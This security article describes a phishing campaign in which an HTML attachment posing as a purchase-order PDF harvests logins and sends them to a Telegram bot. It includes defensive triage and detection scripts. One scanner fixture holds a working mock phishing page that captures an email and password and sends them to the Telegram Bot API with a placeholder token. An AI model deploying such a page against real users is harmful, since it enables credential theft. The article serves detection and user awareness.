In early March 2026, cybersecurity analysts uncovered a deceptive phishing campaign that once again shows how cybercriminals exploit everyday business workflows to steal credentials. An email attachment that looked like a legitimate purchase order PDF was in fact an HTML credential-harvesting page that silently collected victims' login details, along with details about their device and location.
The Illusion: A “PDF” You’re Safe to Open
The threat began with an email seemingly sent to a business professional — perhaps someone in accounts payable, sales, or operations — with a subject and text that mimicked a routine purchase request. The attachment was named:
New PO 500PCS.pdf.hTM
At first glance, it appeared to be a standard PDF purchase order — something recipients open hundreds of times as part of their daily routine.
But there is a key tell-tale sign: the double extension .pdf.hTM. While most users assume a .pdf file is safe, only the final extension counts, and Windows and browsers match it case-insensitively, so .hTM is simply .htm: the file is an HTML document, not a PDF. The odd capitalisation is typical of attempts to slip past filters that compare extensions case-sensitively. HTML files open in a web browser, where they can run JavaScript, display a login form, and send whatever is typed into it to a server the attacker controls.
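The extension check described above is easy to get wrong (case, multiple dots, hidden extensions), so here is an added triage helper, written for this article rather than taken from it, that flags an attachment whose name or first bytes contradict the document type it claims. The filenames and byte samples are constructed for the example; the extension lists are illustrative, not exhaustive.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Extensions a recipient reasonably expects to open in a document viewer.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "rtf", "txt"}
# Final extensions that hand the file to a browser or script host, where it can
# render forms and run code. Illustrative list, not exhaustive.
ACTIVE_EXTS = {"htm", "html", "shtml", "xhtml", "mht", "mhtml", "svg", "hta", "js", "vbs"}
# Every conforming PDF carries this header; readers tolerate it within the first 1 KiB.
PDF_MAGIC = b"%PDF-"
HTML_MARKUP = re.compile(rb"<\s*(!doctype\s+html|html|head|body|script|form|input)\b", re.I)


@dataclass
class Verdict:
    filename: str
    displayed_name: str          # what Explorer shows with "hide known extensions" on (the default)
    suspicious: bool
    reasons: List[str] = field(default_factory=list)


def windows_display_name(filename: str) -> str:
    """Explorer hides only the last extension, and only for registered types.
    Assumption for this example: everything in the two sets above is registered."""
    base, dot, ext = filename.rpartition(".")
    if dot and ext.lower() in DOCUMENT_EXTS | ACTIVE_EXTS:
        return base
    return filename


def triage_attachment(filename: str, head: bytes) -> Verdict:
    """Flag an attachment whose name or content contradicts the document type it claims.
    `head` is the first few hundred bytes of the file."""
    reasons: List[str] = []
    # Lower-case first: Windows and browsers match extensions case-insensitively,
    # so the mixed-case ".hTM" in the sample is exactly as dangerous as ".htm".
    exts = filename.lower().split(".")[1:]
    final = exts[-1] if exts else ""
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS and final in ACTIVE_EXTS:
        reasons.append(f"document extension .{exts[-2]} hidden behind active extension .{final}")
    elif final in ACTIVE_EXTS:
        reasons.append(f"final extension .{final} opens in a browser, not a document viewer")
    if "pdf" in exts and PDF_MAGIC not in head[:1024]:
        reasons.append("name claims PDF but content lacks the %PDF- header")
    if HTML_MARKUP.search(head):
        reasons.append("content is HTML markup")
    return Verdict(filename, windows_display_name(filename), bool(reasons), reasons)


# Constructed samples (not captured from the campaign): an HTML harvester named
# like the article's attachment, a genuine PDF header, and a plain HTML file.
SAMPLES = [
    ("New PO 500PCS.pdf.hTM",
     b"<!DOCTYPE html><html><body><form><input type=password></form></body></html>"),
    ("Invoice 4471.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n"),
    ("quote.html", b"<html><body><p>Quote attached</p></body></html>"),
]

if __name__ == "__main__":
    for name, head in SAMPLES:
        v = triage_attachment(name, head)
        print(f"{name!r} shown as {v.displayed_name!r}: {'SUSPICIOUS' if v.suspicious else 'ok'}")
        for r in v.reasons:
            print("  -", r)
```

The content check matters as much as the name check: a harvester renamed to a plain `.pdf` still fails the `%PDF-` test, and a genuine PDF never contains HTML tags in its first bytes.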
What Happens When the Attachment Is Opened
When the unsuspecting recipient opened the attachment, it didn’t launch Adobe Acrobat or another PDF reader. Instead:
1. A Browser Page Loaded
Instead of showing a document, a phishing web page was displayed in the browser. This page simulated a login prompt — making it appear as though the victim needed to re-enter their password to view the “PDF.”
2. Credentials and More Were Harvested
If the victim entered their password, several pieces of information were collected and sent to the attacker:
- The targeted email address (often pre-filled).
- The entered password.
- Technical details like IP address, geolocation, browser type, and operating system.
This data isn't just useful on its own: with a valid login, cybercriminals can impersonate the victim to other employees, access business systems, or sell the credentials on illicit markets.
3. A “Verification Failed” Trick
After the first submission, the phishing page displayed a fake error (“Your account or password is incorrect. Try again.”). The page has no way to check the password; the error is shown regardless of what was typed. It is a psychological tactic: the victim assumes a typo and enters the password again, more carefully, so the attacker receives two candidate passwords and can be fairly confident that at least one is correct.
4. Nothing Suspicious Happens… Or So It Seems
After the data was sent, the page redirected the victim to an unrelated image that looked like a blurry invoice. This gave victims a reason to think they simply saw an unreadable purchase order, delaying any suspicion that credentials were stolen.
Why This Attack Works
This phishing campaign succeeds because it blends into typical work email traffic: Purchase orders are normal, attachments are expected, and people are conditioned to open documents without thinking twice. By disguising the malicious HTML file as a PDF and hiding behind the familiar workflow of quoting a purchase, the attackers increase their chances of collecting real credentials.
Moreover, rather than emailing the collected data (which could be blocked by security filters), the phishing page sent the credentials silently to a Telegram bot. In practice this is an HTTPS request from the victim's browser to the Telegram Bot API (api.telegram.org), a legitimate and widely used service, so the exfiltration blends in with normal web traffic and is rarely blocked by default. Attackers favour it for the same reason they abuse other popular cloud services as exfiltration or command-and-control channels. A practical check: unless your organisation uses Telegram, outbound connections to api.telegram.org from user workstations are worth alerting on or blocking at the proxy.
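To make the four behaviours above and the Telegram exfiltration concrete for a defender, here is an added scanner, written for this article and not taken from the campaign or any vendor tool, that checks an HTML attachment for each indicator: a password form, a pre-filled email, the fake "try again" error, the retry counter, browser fingerprinting, a Telegram Bot API call, and the decoy image redirect. The sample attachment is constructed to mirror the described behaviour; its bot token, chat id and URLs are fake placeholders, and the scoring threshold is an assumption for illustration.

```python
import re
from typing import Dict, List, Pattern

# Each regex matches one behaviour the article describes. Constructed for
# illustration; tune them against real samples before relying on them.
INDICATORS: Dict[str, Pattern[str]] = {
    "password_form":       re.compile(r"<input[^>]+type=[\"']?password", re.I),
    "prefilled_email":     re.compile(r"<input[^>]+type=[\"']?email[^>]+value=[\"'][^\"']+@", re.I),
    "fake_error_text":     re.compile(r"(password|account)[^<]{0,60}incorrect[^<]{0,40}try again", re.I),
    "retry_counter":       re.compile(r"\battempts?\s*(\+\+|<|>=?)", re.I),
    "browser_fingerprint": re.compile(r"navigator\.(userAgent|platform|language)", re.I),
    "telegram_bot_api":    re.compile(r"api\.telegram\.org/bot\d+:[\w-]+/send(Message|Document)", re.I),
    "decoy_redirect":      re.compile(r"location(\.href)?\s*=\s*[\"'][^\"']+\.(jpe?g|png|gif|webp)", re.I),
}
# Telegram bot tokens have the shape <bot_id>:<secret>. Only the bot id and the
# edges of the secret are reported, so the scanner's output can be shared safely.
TOKEN_RE = re.compile(r"\bbot(\d+):([\w-]{20,})")
# Indicators that are individually strong; everything else adds one point.
STRONG = {"password_form", "telegram_bot_api"}


def scan_html_attachment(html: str) -> Dict[str, object]:
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(html)]
    bots = [f"{bot_id}:{secret[:4]}...{secret[-4:]}" for bot_id, secret in TOKEN_RE.findall(html)]
    score = sum(3 if h in STRONG else 1 for h in hits)
    # Threshold (assumption for this example): a login form alone scores 3 and is
    # inconclusive; a login form plus any exfil or deception indicator is enough.
    verdict = "credential-harvesting page" if score >= 4 else "inconclusive"
    return {"indicators": hits, "telegram_bots": bots, "score": score, "verdict": verdict}


# Constructed sample that mirrors the behaviour described above. It is not the
# kit from the campaign; the token, chat id and URLs are fake placeholders.
SAMPLE_ATTACHMENT = """<html><body>
<form id="f">
  <input type="email" name="email" value="victim@example.com">
  <input type="password" name="pw" placeholder="Enter password to view PDF">
  <div id="err" style="display:none">Your account or password is incorrect. Try again.</div>
  <button>Open Document</button>
</form>
<script>
var attempts = 0;
document.getElementById("f").onsubmit = async function (e) {
  e.preventDefault();
  attempts++;
  var msg = "email=" + email.value + " pw=" + pw.value +
            " ua=" + navigator.userAgent + " os=" + navigator.platform;
  await fetch("https://api.telegram.org/bot123456789:AAFakeTokenForTheExampleOnly_0000000/sendMessage" +
              "?chat_id=-1001234&text=" + encodeURIComponent(msg));
  if (attempts < 2) { err.style.display = "block"; return; }   // first try always "fails"
  location.href = "https://cdn.example.invalid/blurry-invoice.jpg";  // decoy
};
</script>
</body></html>"""

BENIGN_NEWSLETTER = "<html><body><p>Monthly update</p><img src='logo.png'></body></html>"

if __name__ == "__main__":
    for label, doc in (("attachment", SAMPLE_ATTACHMENT), ("newsletter", BENIGN_NEWSLETTER)):
        print(label, scan_html_attachment(doc))
```

Real kits usually hide the script behind `atob()`, `unescape()` or split string literals, so decode those layers (or run the page in a sandboxed browser and scan the DOM it produces) before applying these regexes. The same token pattern is useful on proxy logs: a request to api.telegram.org/bot<id>:<secret>/sendMessage from a user's browser moments after an HTML attachment was opened is a strong detection on its own.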
What Happens After Credentials Are Stolen?
Once attackers have your email + password combination, along with location and system details, several bad outcomes are possible:
- Account takeover — If those credentials belong to your business systems (email, CRM, vendor portal), attackers can log in as you.
- Lateral attacks — Once inside, criminals can target other accounts or systems.
- Resale on dark markets — Many stolen credentials are sold to other threat actors.
- Credential reuse exploitation — Even if the account wasn’t critical, reused passwords can compromise other accounts.
How to Protect Yourself
Here are practical defenses against this and similar threats:
1. Check File Extensions Carefully
Don't trust file names based on how they look. A double extension like .pdf.htm is suspicious: that is not how genuine PDF documents are delivered. Be aware that Windows hides the final extension of known file types by default, so this attachment can appear in Explorer as "New PO 500PCS.pdf" with a browser icon; the icon, or the Type column, gives it away. Turning on "File name extensions" in Explorer removes the ambiguity.
2. Never Enter Credentials Based on an Attachment Prompt
Your browser should never ask for your password to open a PDF or document; legitimate files open without requiring credentials. A second tell: a page opened from an attachment shows a local file:// path (or a temporary folder on disk) in the address bar, not your identity provider's domain. No genuine sign-in page lives on your hard drive.
3. Use Multi-Factor Authentication (MFA)
MFA adds an additional layer of verification, so a stolen password alone is usually not enough to gain access. This campaign's page captured only passwords, so any form of MFA would have blunted it; phishing-resistant methods (FIDO2 security keys or passkeys) also hold up against more advanced kits that relay one-time codes in real time.
4. Use Real-Time Security Tools
Anti-malware with web protection can flag suspicious attachments and phishing content before you interact with them. At the mail gateway, quarantining HTML attachments (.htm, .html, .shtml, .mht), including inside archives, removes this whole class of lure; few business processes need to send HTML files by email.
5. Educate Your Team
Most phishing attacks begin with human error. Training your team to recognize phishing indicators — like mismatched extensions, requests for credentials, and strange redirections — is one of the strongest defenses.
Final Thoughts: Awareness Is Your Best Defense
The growing sophistication of phishing techniques means your instincts and attention to detail are invaluable. Attackers count on familiarity and complacency — if you pause before opening attachments and think about the context of the request, you’re already much safer.
This campaign — disguised as an everyday business document — highlights how social engineering remains one of the most effective tools for cybercriminals. By learning to spot subtle red flags and applying basic security practices, you can dramatically reduce your risk of falling victim to similar scams.
